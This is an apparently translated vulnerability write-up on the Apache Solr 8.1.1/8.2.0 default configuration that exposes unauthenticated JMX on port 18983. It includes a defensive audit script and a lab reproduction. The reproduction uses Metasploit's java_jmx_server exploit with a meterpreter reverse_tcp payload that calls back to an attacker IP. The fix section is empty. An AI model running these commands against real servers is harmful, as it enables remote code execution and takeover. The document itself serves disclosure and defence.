Solr is a standalone enterprise search server that exposes a web-service-like API. Users can submit XML documents in a defined format to the search server over HTTP to build indexes, and can issue search requests with HTTP GET and receive the results in XML format.
This vulnerability stems from a security risk in the ENABLE_REMOTE_JMX_OPTS option in the default configuration file solr.in.sh. The setting ENABLE_REMOTE_JMX_OPTS="true" is present in the built-in solr.in.sh of Apache Solr versions 8.1.1 and 8.2.0. If you use the default solr.in.sh file from an affected version, JMX monitoring is enabled and exposed on RMI_PORT (default = 18983) without any authentication. If this port is open to inbound traffic in the firewall, anyone with network access to the Solr node can access JMX and upload malicious code to be executed on the Solr server. This vulnerability does not affect users of Windows systems; it only affects users of some versions of Linux.
Apache Solr 8.1.1 release date: 2019-05-28
Apache Solr 8.2.0 release date: 2019-07-25
If the victim uses this default configuration, the JMX service will be opened on the default port 18983, and authentication will not be enabled by default. Any attacker with access to this port could exploit this vulnerability to launch an attack on the affected service and execute arbitrary code.
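The condition described above can be checked on a node by reading its solr.in.sh. The script below is an added example, not code from the original article or from the Solr project. The function names are hypothetical and the sample file is constructed. It assumes that a missing ENABLE_REMOTE_JMX_OPTS line means disabled and that the article's default port 18983 applies when RMI_PORT is not set.

```shell
#!/bin/sh
# Added example: audit a solr.in.sh for the remote-JMX setting the article describes.

# Print the effective (last uncommented) value assigned to variable $2 in file $1.
# The file is parsed as text, never sourced, so nothing in it is executed.
effective_value() {
    sed -n "s/^[[:space:]]*$2=//p" "$1" | tail -n 1 |
        sed -e 's/[[:space:]]*#.*$//' -e 's/[[:space:]]*$//' \
            -e 's/^"\(.*\)"$/\1/' -e "s/^'\(.*\)'\$/\1/"
}

# Exit status: 0 = remote JMX not enabled by this file, 1 = enabled, 2 = unreadable.
audit_solr_in_sh() {
    file=$1
    [ -r "$file" ] || { echo "cannot read $file" >&2; return 2; }
    jmx=$(effective_value "$file" ENABLE_REMOTE_JMX_OPTS)
    port=$(effective_value "$file" RMI_PORT)
    # Assumption: with no RMI_PORT line, the article's default of 18983 applies.
    [ -n "$port" ] || port=18983
    if [ "$jmx" = "true" ]; then
        echo "EXPOSED: $file enables unauthenticated remote JMX on port $port"
        return 1
    fi
    # Assumption: a missing assignment is treated as disabled.
    echo "OK: $file does not enable remote JMX (value: ${jmx:-unset})"
    return 0
}

# Demo on a constructed sample that mimics the affected default file.
sample=$(mktemp)
cat > "$sample" <<'EOF'
# ENABLE_REMOTE_JMX_OPTS="false"
ENABLE_REMOTE_JMX_OPTS="true"
# RMI_PORT=18983
EOF
audit_solr_in_sh "$sample" ||
    echo "action: set ENABLE_REMOTE_JMX_OPTS=\"false\" and restart Solr, or firewall the port"
rm -f "$sample"
```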
Environment: Java and a Kali system, Solr 8.2.0
Solr 8.2.0 download address:
wget http://archive.apache.org/dist/lucene/solr/8.2.0/solr-8.2.0.zip
Use unzip solr-8.2.0.zip to decompress. After decompression is complete, switch to the bin directory and start Solr:
./solr start -force
Access after startup: http://192.168.10.176:8983/
0x04 Vulnerability reproduction
Victim machine: Docker on Ubuntu 18.6, IP 192.168.10.184:8983
1. Use nmap to scan the ports; port 18983 is found to be open.
2. Use the exploit/multi/misc/java_jmx_server module in Metasploit to reproduce the vulnerability:
    use exploit/multi/misc/java_jmx_server
    set RHOST 192.168.10.184
    set RPORT 18983
Set the payload to java/meterpreter/reverse_tcp:
    set payload java/meterpreter/reverse_tcp
    set LHOST 192.168.10.147
    set LPORT 4444
3. Use run to execute, and you will see the connection successfully established.
0x05 Fix suggestion